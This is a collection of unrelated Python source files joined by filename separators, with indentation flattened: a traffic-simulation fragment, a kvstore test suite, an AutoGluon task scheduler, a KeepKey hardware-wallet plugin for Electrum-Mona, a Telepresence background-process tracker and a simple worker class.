traffic_light_node_dict[i]['neighbor_ENWS'].append(edge_id_dict[road_id]['to'])
return traffic_light_node_dict
@staticmethod
def _cal_distance(loc_dict1, loc_dict2):
a = np.array((loc_dict1['x'], loc_dict1['y']))
b = np.array((loc_dict2['x'], loc_dict2['y']))
return np.sqrt(np.sum((a - b) ** 2))
def end_sumo(self):
print("anon process end")
pass
if __name__ == '__main__':
pass
inter_and_neighbor_state = {}
inter_state = {"aaa": [122, 1, 2, 3, 3],
"bbb": [122, 1, 2, 3, 3],
"ccc": [122, 1, 2, 3, 3],
"ddd": [122, 1, 2, 3, 3]
}
none_state = deepcopy(inter_state)
for key in none_state.keys():
none_state[key] = [0] * len(none_state[key])
def _add_suffix_to_dict_key(target_dict, suffix):
keys = list(target_dict.keys())
for key in keys:
target_dict[key + "_" + suffix] = target_dict.pop(key)
return target_dict
inter_and_neighbor_state.update(inter_state)
id_to_index = [None, 1, 2, None]
for i in range(4):
if id_to_index[i] is None: # if one's neighbor is None, fill in with zero values
example_value = _add_suffix_to_dict_key(deepcopy(none_state), str(i))
else:
example_value = _add_suffix_to_dict_key(deepcopy(inter_state), str(i))
inter_and_neighbor_state.update(example_value)
|
tests.py
|
"""Tests for the kvstore API"""
import unittest
import kvstore
import Queue
import threading
ENDPOINT = 'http://10.112.0.101:8500/v1/kv'
class KVStoreTestCase(unittest.TestCase):
def setUp(self):
self.kv = kvstore.Client(ENDPOINT)
def tearDown(self):
self.kv.delete('__testing__', recursive=True)
def test_set_new_key(self):
key = '__testing__/testsetnew'
value = '123456'
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(returned, value)
def test_set_new_key_starting_with_slash(self):
key = '/__testing__/testsetnew'
value = '123456'
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(returned, value)
def test_set_update_key(self):
key = '__testing__/testsetupdate'
value = 'orig'
self.kv.set(key, value)
value = 'new'
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(returned, value)
def test_set_int_value(self):
key = '__testing__/testsetnew'
value = 1
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(int(returned), value)
def test_get_existing_key(self):
key = '__testing__/testget'
value = '123456'
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(returned, value)
def test_get_existing_key_starting_with_slash(self):
key = '/__testing__/testget'
value = '123456'
self.kv.set(key, value)
returned = self.kv.get(key)
self.assertEqual(returned, value)
def test_get_wait_returns_after_timeout_expired(self):
key = '__testing__/testwaittimeout'
expected = '000'
self.kv.set(key, expected)
index = self.kv.index(key)
result = self.kv.get(key, wait=True, wait_index=index, timeout='1s')
self.assertEqual(result, expected)
def test_get_wait_with_index_and_timeout(self):
key = '__testing__/testwait'
initial = '000'
expected = '123'
self.kv.set(key, initial)
index = self.kv.index(key)
def wait_until_key_changes(key, index, timeout, q):
q.put(self.kv.get(key, wait=True, wait_index=index, timeout=timeout))
q = Queue.Queue()
t = threading.Thread(target=wait_until_key_changes, args=(key, index, '5s', q))
t.daemon = True
t.start()
self.kv.set(key, expected)
t.join()
result = q.get()
self.assertEqual(result, expected)
def test_recurse(self):
expected = {'__testing__/r0': 'r0',
'__testing__/r0/r1': 'r1',
'__testing__/r0/r1/r2': 'r2'}
for (k, v) in expected.items():
self.kv.set(k, v)
result = self.kv.recurse('__testing__')
self.assertEqual(result, expected)
def test_recurse_wait_with_index_and_timeout(self):
key = '__testing__'
initial = {'__testing__/r0': '',
'__testing__/r0/r1': '',
'__testing__/r0/r1/r2': ''}
key_updated = '__testing__/r0/r1/r2'
value_updated = 'FINAL'
expected = {'__testing__/r0': '',
'__testing__/r0/r1': '',
key_updated: value_updated}
for (k, v) in initial.items():
self.kv.set(k, v)
index = self.kv.index(key, recursive=True)
def wait_until_key_changes(key, index, timeout, q):
result = self.kv.recurse(key, wait=True, wait_index=index, timeout=timeout)
q.put(result)
q = Queue.Queue()
t = threading.Thread(target=wait_until_key_changes, args=(key, index, '5s', q))
t.daemon = True
t.start()
self.kv.set(key_updated, value_updated)
t.join()
result = q.get()
self.assertEqual(result, expected)
def test_index_increases(self):
key = '__testing__/testindex'
expected = '000'
self.kv.set(key, expected)
index1 = self.kv.index('__testing__/testwait')
self.kv.set(key, expected)
index2 = self.kv.index('__testing__/testwait')
self.assertGreater(index2, index1)
def test_delete_existing_key(self):
key = '__testing__/testdelete'
value = '123456'
self.kv.set(key, value)
def test_delete_non_existing_key(self):
key = '__testing__/testdelete'
self.kv.delete(key)
self.assertRaises(kvstore.KeyDoesNotExist, self.kv.get, key)
def test_delete_recursive(self):
self.kv.set('__testing__/testdeleterecursive', 'XYZ')
self.kv.set('__testing__/testdeleterecursive/level0', 'XYZ')
self.kv.set('__testing__/testdeleterecursive/level0/level1', 'XYZ')
self.kv.delete('__testing__/testdeleterecursive', recursive=True)
self.assertRaises(kvstore.KeyDoesNotExist, self.kv.get, '__testing__/testdeleterecursive')
if __name__ == '__main__':
unittest.main()
|
scheduler.py
|
"""Distributed Task Scheduler"""
import os
import pickle
import logging
import sys
import distributed
from warnings import warn
import multiprocessing as mp
from collections import OrderedDict
from .remote import RemoteManager
from .resource import DistributedResourceManager
from .. import Task
from .reporter import *
from ..utils import AutoGluonWarning, AutoGluonEarlyStop, CustomProcess
logger = logging.getLogger(__name__)
__all__ = ['TaskScheduler']
class ClassProperty(object):
def __init__(self, fget):
self.fget = fget
def __get__(self, owner_self, owner_cls):
return self.fget(owner_cls)
class TaskScheduler(object):
"""Base Distributed Task Scheduler
"""
LOCK = mp.Lock()
_resource_manager = None
_remote_manager = None
@ClassProperty
def resource_manager(cls):
if cls._resource_manager is None:
cls._resource_manager = DistributedResourceManager()
return cls._resource_manager
@ClassProperty
def remote_manager(cls):
if cls._remote_manager is None:
cls._remote_manager = RemoteManager()
return cls._remote_manager
def __init__(self, dist_ip_addrs=None):
if dist_ip_addrs is None:
dist_ip_addrs=[]
cls = TaskScheduler
remotes = cls.remote_manager.add_remote_nodes(dist_ip_addrs)
cls.resource_manager.add_remote(cls.remote_manager.get_remotes())
self.scheduled_tasks = []
self.finished_tasks = []
def add_remote(self, ip_addrs):
"""Add remote nodes to the scheduler computation resource.
"""
ip_addrs = [ip_addrs] if isinstance(ip_addrs, str) else ip_addrs
with self.LOCK:
remotes = TaskScheduler.remote_manager.add_remote_nodes(ip_addrs)
TaskScheduler.resource_manager.add_remote(remotes)
@classmethod
def upload_files(cls, files, **kwargs):
"""Upload files to remote machines, so that they are accessible by import or load.
"""
cls.remote_manager.upload_files(files, **kwargs)
def _dict_from_task(self, task):
if isinstance(task, Task):
return {'TASK_ID': task.task_id, 'Args': task.args}
else:
assert isinstance(task, dict)
return {'TASK_ID': task['TASK_ID'], 'Args': task['Args']}
def add_task(self, task, **kwargs):
"""add_task() is now deprecated in favor of add_job().
"""
warn("scheduler.add_task() is now deprecated in favor of scheduler.add_job().",
AutoGluonWarning)
self.add_job(task, **kwargs)
def add_job(self, task, **kwargs):
"""Adding a training task to the scheduler.
Args:
task (:class:`autogluon.scheduler.Task`): a new training task
Relevant entries in kwargs:
- bracket: HB bracket to be used. Has been sampled in _promote_config
- new_config: If True, task starts new config eval, otherwise it promotes
a config (only if type == 'promotion')
Only if new_config == False:
- config_key: Internal key for config
- resume_from: config promoted from this milestone
- milestone: config promoted to this milestone (next from resume_from)
"""
# adding the task
cls = TaskScheduler
if not task.resources.is_ready:
cls.resource_manager._request(task.resources)
job = cls._start_distributed_job(task, cls.resource_manager)
new_dict = self._dict_from_task(task)
new_dict['Job'] = job
with self.LOCK:
self.scheduled_tasks.append(new_dict)
def run_job(self, task):
"""Run a training task to the scheduler (Sync).
"""
cls = TaskScheduler
cls.resource_manager._request(task.resources)
job = cls._start_distributed_job(task, cls.resource_manager)
return job.result()
@staticmethod
def _start_distributed_job(task, resource_manager):
"""Async Execute the job in remote and release the resources
"""
logger.debug('\nScheduling {}'.format(task))
job = task.resources.node.submit(TaskScheduler._run_dist_job,
task.fn, task.args, task.resources.gpu_ids)
def _release_resource_callback(fut):
logger.debug('Start Releasing Resource')
resource_manager._release(task.resources)
job.add_done_callback(_release_resource_callback)
return job
@staticmethod
def _run_dist_job(fn, args, gpu_ids):
"""Remote function Executing the task
"""
if '_default_config' in args['args']:
args['args'].pop('_default_config')
if 'reporter' in args:
local_reporter = LocalStatusReporter()
dist_reporter = args['reporter']
args['reporter'] = local_reporter
manager = mp.Manager()
return_list = manager.list()
def _worker(return_list, gpu_ids, args):
"""Worker function in thec client
"""
if len(gpu_ids) > 0:
# handle GPU devices
os.environ['CUDA_VISIBLE_DEVICES'] = ",".join(map(str, gpu_ids))
os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = "0"
# running
try:
ret = fn(**args)
except AutoGluonEarlyStop:
ret = None
return_list.append(ret)
try:
# start local progress
p = CustomProcess(target=_worker, args=(return_list, gpu_ids, args))
p.start()
if 'reporter' in args:
cp = Communicator.Create(p, local_reporter, dist_reporter)
p.join()
except Exception as e:
logger.error('Exception in worker process: {}'.format(e))
ret = return_list[0] if len(return_list) > 0 else None
return ret
def _clean_task_internal(self, task_dict):
pass
def _cleaning_tasks(self):
with self.LOCK:
new_scheduled_tasks = []
for task_dict in self.scheduled_tasks:
if task_dict['Job'].done():
self._clean_task_internal(task_dict)
self.finished_tasks.append(self._dict_from_task(task_dict))
else:
new_scheduled_tasks.append(task_dict)
if len(new_scheduled_tasks) < len(self.scheduled_tasks):
self.scheduled_tasks = new_scheduled_tasks
def join_tasks(self):
warn("scheduler.join_tasks() is now deprecated in favor of scheduler.join_jobs().",
AutoGluonWarning)
self.join_jobs()
def join_jobs(self, timeout=None):
"""Wait all scheduled jobs to finish
"""
self._cleaning_tasks()
for task_dict in self.scheduled_tasks:
try:
task_dict['Job'].result(timeout=timeout)
except distributed.TimeoutError as e:
logger.error(str(e))
except:
logger.error("Unexpected error:", sys.exc_info()[0])
raise
self._clean_task_internal(task_dict)
self._cleaning_tasks()
def shutdown(self):
"""shutdown() is now deprecated in favor of :func:`autogluon.done`.
"""
warn("scheduler.shutdown() is now deprecated in favor of autogluon.done().",
AutoGluonWarning)
self.join_jobs()
self.remote_manager.shutdown()
def state_dict(self, destination=None):
"""Returns a dictionary containing a whole state of the Scheduler
Examples
--------
>>> ag.save(scheduler.state_dict(), 'checkpoint.ag')
"""
if destination is None:
destination = OrderedDict()
destination._metadata = OrderedDict()
destination['finished_tasks'] = pickle.dumps(self.finished_tasks)
destination['TASK_ID'] = Task.TASK_ID.value
return destination
def load_state_dict(self, state_dict):
"""Load from the saved state dict.
Examples
--------
>>> scheduler.load_state_dict(ag.load('checkpoint.ag'))
"""
self.finished_tasks = pickle.loads(state_dict['finished_tasks'])
Task.set_id(state_dict['TASK_ID'])
logger.debug('\nLoading finished_tasks: {} '.format(self.finished_tasks))
@property
def num_finished_tasks(self):
return len(self.finished_tasks)
def __repr__(self):
reprstr = self.__class__.__name__ + '(\n' + \
str(self.resource_manager) +')\n'
return reprstr
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_mona.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_mona.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_mona.bip32 import BIP32Node
from electrum_mona import constants
from electrum_mona.i18n import _
from electrum_mona.transaction import deserialize, Transaction
from electrum_mona.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_mona.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Monacoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
background.py
|
# Copyright 2018 Datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABC, abstractmethod
from http.server import HTTPServer, BaseHTTPRequestHandler
from subprocess import Popen, TimeoutExpired
from threading import Thread
from typing import Optional, Callable, List
from telepresence.utilities import kill_process
class Background(ABC):
"""
A process or thread running separately from the main thread
"""
def __init__(self, name: str, killer: Optional[Callable],
critical: bool) -> None:
"""
:param name: Always useful for identification in messages
:param killer: Optional callable to kill this background thing
:param critical: Is the death of this item fatal to the session?
"""
self.name = name
self.killer = killer
self.critical = critical
@property
@abstractmethod
def alive(self) -> bool:
pass
@abstractmethod
def join(self, timeout: Optional[float]) -> None:
pass
@abstractmethod
def kill(self) -> None:
pass
def __str__(self) -> str:
return "{} {}".format(self.__class__.__name__, self.name)
class BackgroundThread(Background):
def __init__(
self, name, thread: Thread, killer=None, critical=True
) -> None:
super().__init__(name, killer, critical)
self.thread = thread
@property
def alive(self) -> bool:
return self.thread.is_alive()
def join(self, timeout: Optional[float] = None) -> None:
self.thread.join(timeout)
if self.thread.is_alive():
raise TimeoutExpired(["Thread", self.name], timeout)
def kill(self) -> None:
assert self.killer is not None
if self.thread.is_alive():
self.killer()
self.thread.join()
class BackgroundProcess(Background):
def __init__(
self, name: str, process: Popen, killer=None, critical=True
) -> None:
super().__init__(name, killer, critical)
self.process = process
@property
def alive(self) -> bool:
return self.process.poll() is None
def join(self, timeout: Optional[float] = None) -> None:
self.process.wait(timeout)
def kill(self) -> None:
if self.killer is None:
self.killer = lambda: kill_process(self.process)
self.killer()
self.process.wait()
class TrackedBG(object):
"""
Tracked background processes, threads, etc.
"""
def __init__(self, runner):
List # Avoid Pyflakes F401
self.runner = runner
self.subprocesses = [] # type: List[Background]
runner.add_cleanup("Kill background items", self.killall)
def append(self, bg: Background) -> None:
"""
Register a background item to be tracked and eventually shut down
"""
self.subprocesses.append(bg)
# Grep-able log: self.runner.write("Tracking {}".format(bg))
def killall(self):
"""
Kill all tracked items
"""
for bg in reversed(self.subprocesses):
self.runner.write("Killing {}".format(bg))
bg.kill()
def which_dead(self) -> List[Background]:
"""
Return which (if any) background items are dead.
FIXME: Does not consider critical flag.
"""
dead_processes = [] # type: List[Background]
dead_others = []
for bg in self.subprocesses:
if not bg.alive:
if isinstance(bg, BackgroundProcess):
dead_processes.append(bg)
exit_info = " (exit code {})".format(bg.process.poll())
else:
dead_others.append(bg)
exit_info = " (why?)"
self.runner.write("{} is dead{}".format(bg, exit_info))
assert not dead_others, dead_others
return dead_processes + dead_others
class DumbHandler(BaseHTTPRequestHandler):
"""
HTTP handler that returns success for any HEAD request
"""
tel_output = print
def do_HEAD(self) -> None:
"Handle head"
self.send_response(200)
self.end_headers()
def log_message(self, format: str, *args) -> None:
"""
Make sure log messages go to the right place
"""
message = format % args
if message == '"HEAD / HTTP/1.1" 200 -':
message = "(proxy checking local liveness)"
self.tel_output(message)
def launch_local_server(port: int, output) -> Background:
"""
Make a dumb web server for the proxy pod to poll.
"""
DumbHandler.tel_output = output.write
server = HTTPServer(("127.0.0.1", port), DumbHandler)
thread = Thread(target=server.serve_forever, daemon=True)
thread.start()
name = "Web server for proxy poll"
output.write("Launching " + name)
return BackgroundThread(name, thread, killer=server.shutdown)
|
worker.py
|
import time
import datetime
import json
import redis
import threading
import sys
import constants
from logger.Logger import Logger, LOG_LEVEL
class Worker:
"""Base Worker Class
A worker is responsible for handling its set of operations and
running on a thread
"""
def __init__(self, config, main_thread_running, system_ready):
self.config = config
# Threading Events to Keep Everything in Sync
self.main_thread_running = main_thread_running
self.system_ready = system_ready
self.worker_available = threading.Event()
self.components = []
return
def init(self):
# print('Worker...\t\t\t\033[1;32m Initializing\033[0;0m'.format(**control))
return
def run(self):
t = threading.Thread(target=self.work, args=())
t.start()
return t
def work(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
time.sleep(self.sleep_duration)
# This is only ran after the main thread is shut down
Logger.log(LOG_LEVEL["info"],
"Worker Shutting Down...\t\033[1;32m Complete\033[0;0m")
def elapsed_time(self):
self.time_elapsed = time.perf_counter() - self.time_start
return self.time_elapsed
def reset_elapsed_time(self):
self.time_start = time.perf_counter()
pass
